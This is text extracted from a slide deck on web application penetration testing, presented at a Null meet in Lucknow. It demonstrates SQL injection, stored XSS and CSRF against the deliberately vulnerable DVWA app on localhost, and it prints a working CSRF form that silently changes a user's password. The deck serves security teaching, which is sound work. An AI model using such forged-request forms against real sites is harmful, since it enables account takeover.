Professional Documents
Culture Documents
Web Application Penetration Testing: Pre Null Meet - Lucknow
Web Application Penetration Testing: Pre Null Meet - Lucknow
LUCKNOW
APPLICATION
WEB
PENETRATION TESTING
Srivastava
Security Researcher
Anurag
Information
Injection
Sql Injection
Returns
true for all
I tried to
execute a sql
query in the
input field here
along with a
true return
value
query
Database
Name
(DVWA)
Am I Vulnerable To 'Injection'?
Payload
Store
d XSS
Am I Vulnerable To 'Cross-Site
Scripting (XSS)'?
CSRF
<form
action="http://127.0.0.1/dvwa/vulnerabilities/
csrf/?" method="GET"> New
password:<br>
<input type="password"
AUTOCOMPLETE="off"
name="password_new"
value="anurag"><br>
Confirm new password: <br>
<input type="password"
AUTOCOMPLETE="off"
name="password_conf"
value="anurag"><br>
<input type="submit" value="Change"
Submitting
the form
Wow !
Password has
been Changed
Am I Vulnerable To 'Cross-Site
Request Forgery (CSRF)'?
Only 10 ?
NO , There are not only
10 but hundreds of
issues that could affect
the overall security of a
web application.
COUNTERMEASURES
Thanks !
Anurag Srivastava
Information Source